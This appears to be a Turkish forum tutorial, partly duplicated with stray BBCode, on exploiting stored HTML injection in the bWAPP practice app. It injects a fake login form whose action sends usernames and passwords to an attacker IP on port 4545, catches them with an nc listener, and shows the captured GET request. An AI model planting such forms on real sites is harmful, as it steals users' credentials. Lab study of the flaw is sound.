Merhaba. Bu konuda bWAPP üzerinden stored açıklı site de nasıl bir login oluşturup insanları kandırırız ondan bahsedeceğim.
HTML Dosyası Hazırlamak
Bu olay formlar ile yapılıyor. Şimdi çok basit bir HTML dosyası oluşturacağız bu bir login ekranı olarak görünecek. Ve kişi HTML açıklı siteye girdiğinde yazı yazma kısmında bu login olacak ve diyecekki sanırım username ve password vermem gerekiyor diyip oraya verecek. Ve bizde 4545 portundan gelen veriler ile girdiği bilgileri alacağız.
Şeklinde bir HTML dosyası oluşturuyoruz. Şimdi kodları hazır vereceğim. Mantığını anlamanız yeterli olacaktır.
Kodlar bu şekilde. Önce bir form oluşturuyoruz adı login formu. Sonra action yani aktivite göstereceği yer. Siz oraya kendi local ip nizi yazacaksınız bWAPP orada çünkü. Sonrasında tr td ile daha inandırıcı olması açısından görünürlük ve inputlar ile veri isteme ve submit ile bir login tuşu. Eğer hedef sitede HTML kodları çalışıyorsa bu da çalışacaktır. bWAPP i açıp stored açıklı yere geliyoruz.
Burayı HTML açıklı site düşünün yazı yazma kısmına bu kodları yapıştırıyoruz bakalım ne olacak.
Gördüğünüz gibi bir login kısmı geldi. Tabi gerçek bir saldırı yaparken böyle yapılmaz siteye göre vs. bir ekran yapılır css ile süslenir yeri ayarlanır gibi. Hatırlarsanız kodda portu 4545 vermiştik. Terminali açalım.
Kodu ile 4545 den gelen verileri dinlemeye alıyoruz.
Şuanda dinlemeye alındı. Şimdi biri gelip o bWAPP deki login kısmına girerse. Örneğin Ar Thur olarak giriyorum. Sitede hiç bir şey olmaz ama terminale baktığınızda bir GET isteği alındığını göreceksiniz.
Konu bu kadardı. Yani HTML açıklı sitelerde saldırganlar bu şekilde şifreleri ele geçirebilir. İyi forumlar.
HTML Dosyası Hazırlamak
Bu olay formlar ile yapılıyor. Şimdi çok basit bir HTML dosyası oluşturacağız bu bir login ekranı olarak görünecek. Ve kişi HTML açıklı siteye girdiğinde yazı yazma kısmında bu login olacak ve diyecekki sanırım username ve password vermem gerekiyor diyip oraya verecek. Ve bizde 4545 portundan gelen veriler ile girdiği bilgileri alacağız.
Kod:
sudo apt-get install gedit
Kod:
cd Desktop
Kod:
gedit form.htmlŞeklinde bir HTML dosyası oluşturuyoruz. Şimdi kodları hazır vereceğim. Mantığını anlamanız yeterli olacaktır.
Kod:
[/B][/COLOR][/SIZE][/FONT]
[FONT=Courier New][SIZE=4][COLOR=White][/COLOR][/SIZE][/FONT]
[FONT=Courier New][SIZE=4][COLOR=White][B]<form name="login" action="http://192.168.1.9:4545/test.html">
<table>
<tr><td>Username: </td><td><input type="text" name="username" placeholder="username"></td></tr>
<tr><td>Password: </td><td><input type="password" name="password" placeholder="password"></td></tr>
</table>
<input type="submit" value="Login">
</form>[/B][/COLOR][/SIZE][/FONT]
[FONT=Courier New][SIZE=4][COLOR=White][B]Kodlar bu şekilde. Önce bir form oluşturuyoruz adı login formu. Sonra action yani aktivite göstereceği yer. Siz oraya kendi local ip nizi yazacaksınız bWAPP orada çünkü. Sonrasında tr td ile daha inandırıcı olması açısından görünürlük ve inputlar ile veri isteme ve submit ile bir login tuşu. Eğer hedef sitede HTML kodları çalışıyorsa bu da çalışacaktır. bWAPP i açıp stored açıklı yere geliyoruz.
Burayı HTML açıklı site düşünün yazı yazma kısmına bu kodları yapıştırıyoruz bakalım ne olacak.
Gördüğünüz gibi bir login kısmı geldi. Tabi gerçek bir saldırı yaparken böyle yapılmaz siteye göre vs. bir ekran yapılır css ile süslenir yeri ayarlanır gibi. Hatırlarsanız kodda portu 4545 vermiştik. Terminali açalım.
Kod:
nc -nlvp 4545Kodu ile 4545 den gelen verileri dinlemeye alıyoruz.
Şuanda dinlemeye alındı. Şimdi biri gelip o bWAPP deki login kısmına girerse. Örneğin Ar Thur olarak giriyorum. Sitede hiç bir şey olmaz ama terminale baktığınızda bir GET isteği alındığını göreceksiniz.
Kod:
GET /test.html?username=Ar&password=Thur HTTP/1.1Konu bu kadardı. Yani HTML açıklı sitelerde saldırganlar bu şekilde şifreleri ele geçirebilir. İyi forumlar.
